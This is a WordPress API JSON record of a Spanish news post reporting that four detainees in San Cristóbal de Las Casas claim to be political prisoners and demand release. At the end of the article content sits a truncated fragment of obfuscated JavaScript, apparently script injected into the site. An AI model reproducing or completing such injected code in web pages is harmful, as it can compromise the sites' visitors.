{"id":13508,"date":"2024-01-10T01:43:54","date_gmt":"2024-01-10T01:43:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13508"},"modified":"2024-01-10T01:43:54","modified_gmt":"2024-01-10T01:43:54","slug":"presos-politicos-claman-por-justicia-y-libertad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13508","title":{"rendered":"Presos pol\u00edticos claman por justicia y libertad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"474\" height=\"296\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240109-WA0024.jpg\" alt=\"\" class=\"wp-image-13509\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240109-WA0024.jpg 474w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/IMG-20240109-WA0024-300x187.jpg 300w\" sizes=\"auto, (max-width: 474px) 100vw, 474px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>09 de Enero del 2024. San Crist\u00f3bal de Las Casas.- Hace 19 meses, el 29 de mayo de 2022, Agust\u00edn P\u00e9rez Dom\u00ednguez, Mart\u00edn P\u00e9rez Dom\u00ednguez, Agust\u00edn P\u00e9rez Velasco y Juan Velasco Aguilar fueron detenidos, acusados injustamente de un delito que, sostienen, no han cometido. Estos presos pol\u00edticos claman por justicia y exigen su liberaci\u00f3n inmediata.<\/p>\n\n\n\n<p>A trav\u00e9s de un documento, los detenidos enviaron un saludo a los compa\u00f1eros del EZLN en su 30 aniversario de resistencia frente al sistema capitalista. Reconocen la lucha constante del Ej\u00e9rcito Zapatista de Liberaci\u00f3n Nacional, que ha buscado construir otro mundo posible, enfrent\u00e1ndose a las injusticias y desigualdades del sistema.<\/p>\n\n\n\n<p>Los presos pol\u00edticos, afirman estar resistiendo y luchando incansablemente por su libertad, por lo que piden un juicio justo que les permita demostrar su inocencia y poner fin a esta situaci\u00f3n que les arrebata la libertad.<\/p>\n\n\n\n<p>El documento es firmado por Agust\u00edn P\u00e9rez Dom\u00ednguez, Mart\u00edn P\u00e9rez Dom\u00ednguez, Agust\u00edn P\u00e9rez Velasco y Juan Velasco Aguilar, quienes aseguran se mantienen firmes en su b\u00fasqueda de justicia y libertad, esperando que su llamado resuene m\u00e1s all\u00e1 de los muros de la prisi\u00f3n y encuentre eco en aquellos dispuestos a escuchar su causa.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 09 de Enero del 2024. San Crist\u00f3bal de Las Casas.- Hace 19 meses, el 29 de mayo de 2022, Agust\u00edn P\u00e9rez Dom\u00ednguez, Mart\u00edn P\u00e9rez Dom\u00ednguez, Agust\u00edn P\u00e9rez Velasco y Juan Velasco Aguilar fueron detenidos, acusados injustamente de un delito que, sostienen, no han cometido. Estos presos pol\u00edticos claman por justicia y exigen su &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13509,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-13508","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13508"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13508\/revisions"}],"predecessor-version":[{"id":13510,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13508\/revisions\/13510"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13509"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}